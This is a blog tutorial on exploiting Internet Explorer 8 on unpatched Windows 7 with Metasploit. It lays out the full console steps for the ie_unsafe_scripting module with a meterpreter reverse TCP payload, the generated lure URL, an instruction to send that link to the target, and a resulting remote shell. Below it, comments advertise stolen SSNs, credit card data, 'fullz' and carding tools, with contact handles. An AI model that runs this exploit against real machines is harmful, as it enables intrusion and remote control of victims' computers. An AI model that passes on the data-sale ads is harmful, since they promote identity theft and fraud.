Saturday, 20 June 2015

Hack Internet Explorer 8 in Windows 7 using Kali Linux


In this tutorial, we will hack Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

This exploit works when the Initialize and script ActiveX controls not marked as safe setting is enabled in Internet Explorer.

To enable the above setting, start Internet Explorer and click on Tools -> Internet Options -> Security -> Custom Level -> Initialize and script ActiveX controls not marked as safe -> Enable.

We have the  following configuration:
Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ie_unsafe_scripting

4) Select payload. 
msf exploit(ie_unsafe_scripting) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

5) View options.
msf exploit(ie_unsafe_scripting) > show options

Module options (exploit/windows/browser/ie_unsafe_scripting):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TECHNIQUE  VBS              yes       Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86/x64

6) Set options
msf exploit(ie_unsafe_scripting) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4
[*]  Local IP: http://192.168.122.115:8080/bHN7e4
[*] Server started.


8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link (http://192.168.122.115:8080/bHN7e4) that we will have to send to our target, so that it can exploit their browser.

When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.

msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10   ie_unsafe_scripting - Request received for /bHN7e4
[*] 192.168.122.10   ie_unsafe_scripting - Sending exploit html/javascript
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\shabbir\Desktop>


6 comments:

  1. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.

    ReplyDelete
  3. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ReplyDelete
  4. We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.

    ReplyDelete
  5. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Sql injector
    Bitcoin cracker
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete